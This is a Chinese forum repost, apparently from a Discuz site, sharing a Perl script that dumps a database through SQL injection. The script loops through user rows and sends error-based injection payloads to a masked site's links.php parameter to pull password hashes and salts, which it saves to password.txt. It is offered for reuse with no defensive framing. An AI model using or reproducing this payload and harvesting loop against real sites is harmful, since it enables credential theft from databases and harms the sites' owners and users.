• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    mysql注入导库脚本代码

    发布者: 网神之王 | 发布时间: 2025-6-27 15:58| 查看数: 85| 评论数: 0|帖子模式

    复制代码代码如下:
    #!/usr/bin/perl -w
    #www.sh3llc0de.com
    #转载须注明
    #语法 自己改改
    use strict;
    use LWP::Simple;
    use utf8;
    $|++;
    my $count = 1;
    for ($count = 1; $count <= 600_000; $count++) {
    print 'ID: ', $count, "\n";
    my $url = 'http://www.***.com/links.php?out=2 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x5e24,0x7c,password,0x3A,salt,0x245e) FROM `wowguru_db`.user LIMIT%20' . $count . ',1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1';
    #print "$url\n";
    my $content = get($url);
    while ($content =~ m|\^\$(.+?)\$\^|igs) {
    open FILE, ">>", "password.txt" or die $!;
    print "$1\n";
    print FILE "$1\n";
    close FILE;
    }
    }

    来源:https://www.jb51.net/hack/40721.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表